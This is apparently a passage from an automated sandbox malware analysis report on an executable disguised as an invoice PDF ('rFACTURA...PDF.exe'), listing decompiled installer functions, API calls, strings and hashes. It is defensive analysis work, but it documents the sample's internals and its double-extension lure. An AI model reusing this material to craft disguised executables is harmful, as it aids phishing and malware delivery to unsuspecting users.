                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405740
                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405754
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405774
                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 0040577F
                                                                                                  • CloseClipboard.USER32 ref: 00405785
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                  • String ID: {
                                                                                                  • API String ID: 590372296-366298937
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph (function 0040596D; graph image not preserved, legend: executed / not executed nodes)
                                                                                                  C-Code - Quality: 98%
                                                                                                  			E0040596D(void* __eflags, signed int _a4, signed int _a8) {
                                                                                                  				signed int _v8;
                                                                                                  				signed int _v12;
                                                                                                  				short _v556;
                                                                                                  				short _v558;
                                                                                                  				struct _WIN32_FIND_DATAW _v604;
                                                                                                  				signed int _t38;
                                                                                                  				signed int _t52;
                                                                                                  				signed int _t55;
                                                                                                  				signed int _t62;
                                                                                                  				void* _t64;
                                                                                                  				signed char _t65;
                                                                                                  				WCHAR* _t66;
                                                                                                  				void* _t67;
                                                                                                  				WCHAR* _t68;
                                                                                                  				void* _t70;
                                                                                                  
                                                                                                  				_t65 = _a8;
                                                                                                  				_t68 = _a4;
                                                                                                  				_v8 = _t65 & 0x00000004;
                                                                                                  				_t38 = E00405C38(__eflags, _t68);
                                                                                                  				_v12 = _t38;
                                                                                                  				if((_t65 & 0x00000008) != 0) {
                                                                                                  					_t62 = DeleteFileW(_t68); // executed
                                                                                                  					asm("sbb eax, eax");
                                                                                                  					_t64 =  ~_t62 + 1;
                                                                                                  					 *0x7a8ac8 =  *0x7a8ac8 + _t64;
                                                                                                  					return _t64;
                                                                                                  				}
                                                                                                  				_a4 = _t65;
                                                                                                  				_t8 =  &_a4;
                                                                                                  				 *_t8 = _a4 & 0x00000001;
                                                                                                  				__eflags =  *_t8;
                                                                                                  				if( *_t8 == 0) {
                                                                                                  					L5:
                                                                                                  					E0040625F(0x7a3f28, _t68);
                                                                                                  					__eflags = _a4;
                                                                                                  					if(_a4 == 0) {
                                                                                                  						E00405B7C(_t68);
                                                                                                  					} else {
                                                                                                  						lstrcatW(0x7a3f28, L"\\*.*");
                                                                                                  					}
                                                                                                  					__eflags =  *_t68;
                                                                                                  					if( *_t68 != 0) {
                                                                                                  						L10:
                                                                                                  						lstrcatW(_t68, 0x40a014);
                                                                                                  						L11:
                                                                                                  						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                                                  						_t38 = FindFirstFileW(0x7a3f28,  &_v604);
                                                                                                  						_t70 = _t38;
                                                                                                  						__eflags = _t70 - 0xffffffff;
                                                                                                  						if(_t70 == 0xffffffff) {
                                                                                                  							L26:
                                                                                                  							__eflags = _a4;
                                                                                                  							if(_a4 != 0) {
                                                                                                  								_t30 = _t66 - 2;
                                                                                                  								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                                                  								__eflags =  *_t30;
                                                                                                  							}
                                                                                                  							goto L28;
                                                                                                  						} else {
                                                                                                  							goto L12;
                                                                                                  						}
                                                                                                  						do {
                                                                                                  							L12:
                                                                                                  							__eflags = _v604.cFileName - 0x2e;
                                                                                                  							if(_v604.cFileName != 0x2e) {
                                                                                                  								L16:
                                                                                                  								E0040625F(_t66,  &(_v604.cFileName));
                                                                                                  								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                                                  								if(__eflags == 0) {
                                                                                                  									_t52 = E00405925(__eflags, _t68, _v8);
                                                                                                  									__eflags = _t52;
                                                                                                  									if(_t52 != 0) {
                                                                                                  										E004052C3(0xfffffff2, _t68);
                                                                                                  									} else {
                                                                                                  										__eflags = _v8 - _t52;
                                                                                                  										if(_v8 == _t52) {
                                                                                                  											 *0x7a8ac8 =  *0x7a8ac8 + 1;
                                                                                                  										} else {
                                                                                                  											E004052C3(0xfffffff1, _t68);
                                                                                                  											E00406025(_t67, _t68, 0);
                                                                                                  										}
                                                                                                  									}
                                                                                                  								} else {
                                                                                                  									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                  									if(__eflags == 0) {
                                                                                                  										E0040596D(__eflags, _t68, _a8);
                                                                                                  									}
                                                                                                  								}
                                                                                                  								goto L24;
                                                                                                  							}
                                                                                                  							__eflags = _v558;
                                                                                                  							if(_v558 == 0) {
                                                                                                  								goto L24;
                                                                                                  							}
                                                                                                  							__eflags = _v558 - 0x2e;
                                                                                                  							if(_v558 != 0x2e) {
                                                                                                  								goto L16;
                                                                                                  							}
                                                                                                  							__eflags = _v556;
                                                                                                  							if(_v556 == 0) {
                                                                                                  								goto L24;
                                                                                                  							}
                                                                                                  							goto L16;
                                                                                                  							L24:
                                                                                                  							_t55 = FindNextFileW(_t70,  &_v604);
                                                                                                  							__eflags = _t55;
                                                                                                  						} while (_t55 != 0);
                                                                                                  						_t38 = FindClose(_t70);
                                                                                                  						goto L26;
                                                                                                  					}
                                                                                                  					__eflags =  *0x7a3f28 - 0x5c;
                                                                                                  					if( *0x7a3f28 != 0x5c) {
                                                                                                  						goto L11;
                                                                                                  					}
                                                                                                  					goto L10;
                                                                                                  				} else {
                                                                                                  					__eflags = _t38;
                                                                                                  					if(_t38 == 0) {
                                                                                                  						L28:
                                                                                                  						__eflags = _a4;
                                                                                                  						if(_a4 == 0) {
                                                                                                  							L36:
                                                                                                  							return _t38;
                                                                                                  						}
                                                                                                  						__eflags = _v12;
                                                                                                  						if(_v12 != 0) {
                                                                                                  							_t38 = E004065A2(_t68);
                                                                                                  							__eflags = _t38;
                                                                                                  							if(_t38 == 0) {
                                                                                                  								goto L36;
                                                                                                  							}
                                                                                                  							E00405B30(_t68);
                                                                                                  							_t38 = E00405925(__eflags, _t68, _v8 | 0x00000001);
                                                                                                  							__eflags = _t38;
                                                                                                  							if(_t38 != 0) {
                                                                                                  								return E004052C3(0xffffffe5, _t68);
                                                                                                  							}
                                                                                                  							__eflags = _v8;
                                                                                                  							if(_v8 == 0) {
                                                                                                  								goto L30;
                                                                                                  							}
                                                                                                  							E004052C3(0xfffffff1, _t68);
                                                                                                  							return E00406025(_t67, _t68, 0);
                                                                                                  						}
                                                                                                  						L30:
                                                                                                  						 *0x7a8ac8 =  *0x7a8ac8 + 1;
                                                                                                  						return _t38;
                                                                                                  					}
                                                                                                  					__eflags = _t65 & 0x00000002;
                                                                                                  					if((_t65 & 0x00000002) == 0) {
                                                                                                  						goto L28;
                                                                                                  					}
                                                                                                  					goto L5;
                                                                                                  				}
                                                                                                  			}



















                                                                                                  APIs
                                                                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405996
                                                                                                  • lstrcatW.KERNEL32(007A3F28,\*.*), ref: 004059DE
                                                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405A01
                                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405A07
                                                                                                  • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405A17
                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AB7
                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405AC6
                                                                                                  Strings
                                                                                                  • "C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe", xrefs: 0040596D
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040597B
                                                                                                  • \*.*, xrefs: 004059D8
                                                                                                  • (?z, xrefs: 004059C6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                  • String ID: "C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                  • API String ID: 2035342205-3918519570
                                                                                                  • Opcode ID: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
                                                                                                  • Instruction ID: bed3c70eefbd60b288d0e49403b05a90b1a02306e0e83ed8d7b57435798b36db
                                                                                                  • Opcode Fuzzy Hash: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
                                                                                                  • Instruction Fuzzy Hash: 4341A430900A14AACF21AB65DC89EAF7678EF46724F10827FF406B11D1D77C5981DE6E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004065A2(WCHAR* _a4) {
                                                                                                  				void* _t2;
                                                                                                  
                                                                                                  				_t2 = FindFirstFileW(_a4, 0x7a4f70); // executed
                                                                                                  				if(_t2 == 0xffffffff) {
                                                                                                  					return 0;
                                                                                                  				}
                                                                                                  				FindClose(_t2);
                                                                                                  				return 0x7a4f70;
                                                                                                  			}





                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00405C81,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,?,76F93420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76F93420), ref: 004065AD
                                                                                                  • FindClose.KERNEL32(00000000), ref: 004065B9
                                                                                                  Strings
                                                                                                  • pOz, xrefs: 004065A3
                                                                                                  • C:\Users\user\AppData\Local\Temp\nsp1D68.tmp, xrefs: 004065A2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsp1D68.tmp$pOz
                                                                                                  • API String ID: 2295610775-407245589
                                                                                                  • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                                  • Instruction ID: ff58ffc18adcfb1e82f863fe631525536c8ca60503d441656b10eafe22cb2dbc
                                                                                                  • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                                  • Instruction Fuzzy Hash: 40D012315190206FC6005778BD0C84B7A989F463307158B36B466F11E4D7789C668AA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$EnableShow
                                                                                                  • String ID:
                                                                                                  • API String ID: 1136574915-0
                                                                                                  • Opcode ID: 3ebbc3ab9dadbc117d2673303f8d1b6626c353d20a106f085f8fc62d721b3797
                                                                                                  • Instruction ID: 8bed64cdced8f5e888a37b1465862a95800e92f45c41cc099ab710eb89ed01f5
                                                                                                  • Opcode Fuzzy Hash: 3ebbc3ab9dadbc117d2673303f8d1b6626c353d20a106f085f8fc62d721b3797
                                                                                                  • Instruction Fuzzy Hash: ABE09272E082008FD7549BA5AA4946D77B0EB84354720803FE112F11C1DA7848418F59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  [Figure: control-flow graph starting at 403d1b; legend: Executed, Not Executed]
                                                                                                  C-Code - Quality: 84%
                                                                                                  			E00403D1B(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                                  				struct HWND__* _v32;
                                                                                                  				void* _v84;
                                                                                                  				void* _v88;
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				signed int _t37;
                                                                                                  				signed int _t39;
                                                                                                  				signed int _t41;
                                                                                                  				struct HWND__* _t51;
                                                                                                  				signed int _t70;
                                                                                                  				struct HWND__* _t76;
                                                                                                  				signed int _t89;
                                                                                                  				struct HWND__* _t94;
                                                                                                  				signed int _t102;
                                                                                                  				int _t106;
                                                                                                  				signed int _t118;
                                                                                                  				signed int _t119;
                                                                                                  				int _t120;
                                                                                                  				signed int _t125;
                                                                                                  				struct HWND__* _t128;
                                                                                                  				struct HWND__* _t129;
                                                                                                  				int _t130;
                                                                                                  				long _t133;
                                                                                                  				int _t135;
                                                                                                  				int _t136;
                                                                                                  				void* _t137;
                                                                                                  				void* _t145;
                                                                                                  
                                                                                                  				_t118 = _a8;
                                                                                                  				if(_t118 == 0x110 || _t118 == 0x408) {
                                                                                                  					_t37 = _a12;
                                                                                                  					_t128 = _a4;
                                                                                                  					__eflags = _t118 - 0x110;
                                                                                                  					 *0x7a1f08 = _t37;
                                                                                                  					if(_t118 == 0x110) {
                                                                                                  						 *0x7a8a28 = _t128;
                                                                                                  						 *0x7a1f1c = GetDlgItem(_t128, "true");
                                                                                                  						_t94 = GetDlgItem(_t128, 2);
                                                                                                  						_push(0xffffffff);
                                                                                                  						_push(0x1c);
                                                                                                  						 *0x79fee8 = _t94;
                                                                                                  						E004041F4(_t128);
                                                                                                  						SetClassLongW(_t128, 0xfffffff2,  *0x7a7a08);
                                                                                                  						 *0x7a79ec = E0040140B("true");
                                                                                                  						_t37 = 1;
                                                                                                  						__eflags = 1;
                                                                                                  						 *0x7a1f08 = 1;
                                                                                                  					}
                                                                                                  					_t125 =  *0x40a368; // 0x0
                                                                                                  					_t136 = 0;
                                                                                                  					_t133 = (_t125 << 6) +  *0x7a8a60;
                                                                                                  					__eflags = _t125;
                                                                                                  					if(_t125 < 0) {
                                                                                                  						L34:
                                                                                                  						E00404240(0x40b);
                                                                                                  						while(1) {
                                                                                                  							_t39 =  *0x7a1f08;
                                                                                                  							 *0x40a368 =  *0x40a368 + _t39;
                                                                                                  							_t133 = _t133 + (_t39 << 6);
                                                                                                  							_t41 =  *0x40a368; // 0x0
                                                                                                  							__eflags = _t41 -  *0x7a8a64;
                                                                                                  							if(_t41 ==  *0x7a8a64) {
                                                                                                  								E0040140B("true");
                                                                                                  							}
                                                                                                  							__eflags =  *0x7a79ec - _t136; // 0x0
                                                                                                  							if(__eflags != 0) {
                                                                                                  								break;
                                                                                                  							}
                                                                                                  							__eflags =  *0x40a368 -  *0x7a8a64; // 0x0
                                                                                                  							if(__eflags >= 0) {
                                                                                                  								break;
                                                                                                  							}
                                                                                                  							_t119 =  *(_t133 + 0x14);
                                                                                                  							E00406281(_t119, _t128, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                                                  							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                                                  							_push(0xfffffc19);
                                                                                                  							E004041F4(_t128);
                                                                                                  							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                                                  							_push(0xfffffc1b);
                                                                                                  							E004041F4(_t128);
                                                                                                  							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                                                  							_push(0xfffffc1a);
                                                                                                  							E004041F4(_t128);
                                                                                                  							_t51 = GetDlgItem(_t128, 3);
                                                                                                  							__eflags =  *0x7a8acc - _t136;
                                                                                                  							_v32 = _t51;
                                                                                                  							if( *0x7a8acc != _t136) {
                                                                                                  								_t119 = _t119 & 0x0000fefd | 0x00000004;
                                                                                                  								__eflags = _t119;
                                                                                                  							}
                                                                                                  							ShowWindow(_t51, _t119 & 0x00000008); // executed
                                                                                                  							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
                                                                                                  							E00404216(_t119 & 0x00000002);
                                                                                                  							_t120 = _t119 & 0x00000004;
                                                                                                  							EnableWindow( *0x79fee8, _t120);
                                                                                                  							__eflags = _t120 - _t136;
                                                                                                  							if(_t120 == _t136) {
                                                                                                  								_push("true");
                                                                                                  							} else {
                                                                                                  								_push(_t136);
                                                                                                  							}
                                                                                                  							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
                                                                                                  							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, "true");
                                                                                                  							__eflags =  *0x7a8acc - _t136;
                                                                                                  							if( *0x7a8acc == _t136) {
                                                                                                  								_push( *0x7a1f1c);
                                                                                                  							} else {
                                                                                                  								SendMessageW(_t128, 0x401, 2, _t136);
                                                                                                  								_push( *0x79fee8);
                                                                                                  							}
                                                                                                  							E00404229();
                                                                                                  							E0040625F(0x7a1f20, E00403CFC());
                                                                                                  							E00406281(0x7a1f20, _t128, _t133,  &(0x7a1f20[lstrlenW(0x7a1f20)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                                                  							SetWindowTextW(_t128, 0x7a1f20); // executed
                                                                                                  							_push(_t136);
                                                                                                  							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                                                                  							__eflags = _t70;
                                                                                                  							if(_t70 != 0) {
                                                                                                  								continue;
                                                                                                  							} else {
                                                                                                  								__eflags =  *_t133 - _t136;
                                                                                                  								if( *_t133 == _t136) {
                                                                                                  									continue;
                                                                                                  								}
                                                                                                  								__eflags =  *(_t133 + 4) - 5;
                                                                                                  								if( *(_t133 + 4) != 5) {
                                                                                                  									DestroyWindow( *0x7a79f8); // executed
                                                                                                  									 *0x7a0ef8 = _t133;
                                                                                                  									__eflags =  *_t133 - _t136;
                                                                                                  									if( *_t133 <= _t136) {
                                                                                                  										goto L58;
                                                                                                  									}
                                                                                                  									_t76 = CreateDialogParamW( *0x7a8a20,  *_t133 +  *0x7a7a00 & 0x0000ffff, _t128,  *(0x40a36c +  *(_t133 + 4) * 4), _t133); // executed
                                                                                                  									__eflags = _t76 - _t136;
                                                                                                  									 *0x7a79f8 = _t76;
                                                                                                  									if(_t76 == _t136) {
                                                                                                  										goto L58;
                                                                                                  									}
                                                                                                  									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                                                  									_push(6);
                                                                                                  									E004041F4(_t76);
                                                                                                  									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
                                                                                                  									ScreenToClient(_t128, _t137 + 0x10);
                                                                                                  									SetWindowPos( *0x7a79f8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                                                  									_push(_t136);
                                                                                                  									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                                                                  									__eflags =  *0x7a79ec - _t136; // 0x0
                                                                                                  									if(__eflags != 0) {
                                                                                                  										goto L61;
                                                                                                  									}
                                                                                                  									ShowWindow( *0x7a79f8, 8); // executed
                                                                                                  									E00404240(0x405);
                                                                                                  									goto L58;
                                                                                                  								}
                                                                                                  								__eflags =  *0x7a8acc - _t136;
                                                                                                  								if( *0x7a8acc != _t136) {
                                                                                                  									goto L61;
                                                                                                  								}
                                                                                                  								__eflags =  *0x7a8ac0 - _t136;
                                                                                                  								if( *0x7a8ac0 != _t136) {
                                                                                                  									continue;
                                                                                                  								}
                                                                                                  								goto L61;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						DestroyWindow( *0x7a79f8);
                                                                                                  						 *0x7a8a28 = _t136;
                                                                                                  						EndDialog(_t128,  *0x7a06f0);
                                                                                                  						goto L58;
                                                                                                  					} else {
                                                                                                  						__eflags = _t37 - 1;
                                                                                                  						if(_t37 != 1) {
                                                                                                  							L33:
                                                                                                  							__eflags =  *_t133 - _t136;
                                                                                                  							if( *_t133 == _t136) {
                                                                                                  								goto L61;
                                                                                                  							}
                                                                                                  							goto L34;
                                                                                                  						}
                                                                                                  						_push(0);
                                                                                                  						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                                                                  						__eflags = _t89;
                                                                                                  						if(_t89 == 0) {
                                                                                                  							goto L33;
                                                                                                  						}
                                                                                                  						SendMessageW( *0x7a79f8, 0x40f, 0, "true");
                                                                                                  						__eflags =  *0x7a79ec - _t136; // 0x0
                                                                                                  						return 0 | __eflags == 0x00000000;
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_t128 = _a4;
                                                                                                  					_t136 = 0;
                                                                                                  					if(_t118 == 0x47) {
                                                                                                  						SetWindowPos( *0x7a1f00, _t128, 0, 0, 0, 0, 0x13);
                                                                                                  					}
                                                                                                  					if(_t118 == 5) {
                                                                                                  						asm("sbb eax, eax");
                                                                                                  						ShowWindow( *0x7a1f00,  ~(_a12 - 1) & _t118);
                                                                                                  					}
                                                                                                  					if(_t118 != 0x40d) {
                                                                                                  						__eflags = _t118 - 0x11;
                                                                                                  						if(_t118 != 0x11) {
                                                                                                  							__eflags = _t118 - 0x111;
                                                                                                  							if(_t118 != 0x111) {
                                                                                                  								L26:
                                                                                                  								return E0040425B(_t118, _a12, _a16);
                                                                                                  							}
                                                                                                  							_t135 = _a12 & 0x0000ffff;
                                                                                                  							_t129 = GetDlgItem(_t128, _t135);
                                                                                                  							__eflags = _t129 - _t136;
                                                                                                  							if(_t129 == _t136) {
                                                                                                  								L13:
                                                                                                  								__eflags = _t135 - 1;
                                                                                                  								if(_t135 != 1) {
                                                                                                  									__eflags = _t135 - 3;
                                                                                                  									if(_t135 != 3) {
                                                                                                  										_t130 = 2;
                                                                                                  										__eflags = _t135 - _t130;
                                                                                                  										if(_t135 != _t130) {
                                                                                                  											L25:
                                                                                                  											SendMessageW( *0x7a79f8, 0x111, _a12, _a16);
                                                                                                  											goto L26;
                                                                                                  										}
                                                                                                  										__eflags =  *0x7a8acc - _t136;
                                                                                                  										if( *0x7a8acc == _t136) {
                                                                                                  											_t102 = E0040140B(3);
                                                                                                  											__eflags = _t102;
                                                                                                  											if(_t102 != 0) {
                                                                                                  												goto L26;
                                                                                                  											}
                                                                                                  											 *0x7a06f0 = 1;
                                                                                                  											L21:
                                                                                                  											_push(0x78);
                                                                                                  											L22:
                                                                                                  											E004041CD();
                                                                                                  											goto L26;
                                                                                                  										}
                                                                                                  										E0040140B(_t130);
                                                                                                  										 *0x7a06f0 = _t130;
                                                                                                  										goto L21;
                                                                                                  									}
                                                                                                  									__eflags =  *0x40a368 - _t136; // 0x0
                                                                                                  									if(__eflags <= 0) {
                                                                                                  										goto L25;
                                                                                                  									}
                                                                                                  									_push(0xffffffff);
                                                                                                  									goto L22;
                                                                                                  								}
                                                                                                  								_push(_t135);
                                                                                                  								goto L22;
                                                                                                  							}
                                                                                                  							SendMessageW(_t129, 0xf3, _t136, _t136);
                                                                                                  							_t106 = IsWindowEnabled(_t129);
                                                                                                  							__eflags = _t106;
                                                                                                  							if(_t106 == 0) {
                                                                                                  								goto L61;
                                                                                                  							}
                                                                                                  							goto L13;
                                                                                                  						}
                                                                                                  						SetWindowLongW(_t128, _t136, _t136);
                                                                                                  						return 1;
                                                                                                  					} else {
                                                                                                  						DestroyWindow( *0x7a79f8);
                                                                                                  						 *0x7a79f8 = _a12;
                                                                                                  						L58:
                                                                                                  						if( *0x7a3f20 == _t136) {
                                                                                                  							_t145 =  *0x7a79f8 - _t136; // 0x60020
                                                                                                  							if(_t145 != 0) {
                                                                                                  								ShowWindow(_t128, 0xa); // executed
                                                                                                  								 *0x7a3f20 = 1;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						L61:
                                                                                                  						return 0;
                                                                                                  					}
                                                                                                  				}
                                                                                                  			}































                                                                                                  0x00403dcf
                                                                                                  0x00403dee
                                                                                                  0x00403dee
                                                                                                  0x00403df1
                                                                                                  0x00403df6
                                                                                                  0x00403df9
                                                                                                  0x00403e09
                                                                                                  0x00403e0a
                                                                                                  0x00403e0c
                                                                                                  0x00403e42
                                                                                                  0x00403e55
                                                                                                  0x00000000
                                                                                                  0x00403e55
                                                                                                  0x00403e0e
                                                                                                  0x00403e14
                                                                                                  0x00403e2d
                                                                                                  0x00403e32
                                                                                                  0x00403e34
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403e36
                                                                                                  0x00403e22
                                                                                                  0x00403e22
                                                                                                  0x00403e24
                                                                                                  0x00403e24
                                                                                                  0x00000000
                                                                                                  0x00403e24
                                                                                                  0x00403e17
                                                                                                  0x00403e1c
                                                                                                  0x00000000
                                                                                                  0x00403e1c
                                                                                                  0x00403dfb
                                                                                                  0x00403e01
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403e03
                                                                                                  0x00000000
                                                                                                  0x00403e03
                                                                                                  0x00403df3
                                                                                                  0x00000000
                                                                                                  0x00403df3
                                                                                                  0x00403dd9
                                                                                                  0x00403de0
                                                                                                  0x00403de6
                                                                                                  0x00403de8
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403de8
                                                                                                  0x00403da4
                                                                                                  0x00000000
                                                                                                  0x00403d82
                                                                                                  0x00403d88
                                                                                                  0x00403d92
                                                                                                  0x0040419e
                                                                                                  0x004041a4
                                                                                                  0x004041a6
                                                                                                  0x004041ac
                                                                                                  0x004041b1
                                                                                                  0x004041b7
                                                                                                  0x004041b7
                                                                                                  0x004041ac
                                                                                                  0x004041c1
                                                                                                  0x00000000
                                                                                                  0x004041c1
                                                                                                  0x00403d80

                                                                                                  APIs
                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D57
                                                                                                  • ShowWindow.USER32(?), ref: 00403D74
                                                                                                  • DestroyWindow.USER32 ref: 00403D88
                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DA4
                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403DC5
                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DD9
                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403DE0
                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403E8E
                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E98
                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB2
                                                                                                  • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F03
                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403FA9
                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403FCA
                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FDC
                                                                                                  • EnableWindow.USER32(?,?), ref: 00403FF7
                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040400D
                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00404014
                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040402C
                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040403F
                                                                                                  • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404069
                                                                                                  • SetWindowTextW.USER32(?,007A1F20), ref: 0040407D
                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004041B1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3282139019-0
                                                                                                  • Opcode ID: 649012c9a47a07fd18c8bc6662fe0bbcc1ec558a86733eef8b886fae08a17129
                                                                                                  • Instruction ID: e7c2d8670a20ab778e0eeae1551072eac63d4844406393878d1a707f383ade6f
                                                                                                  • Opcode Fuzzy Hash: 649012c9a47a07fd18c8bc6662fe0bbcc1ec558a86733eef8b886fae08a17129
                                                                                                  • Instruction Fuzzy Hash: B6C1CDB1504205AFDB206F61ED88E2B3A68EB96705F00853EF651B51F0CB399982DB1E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
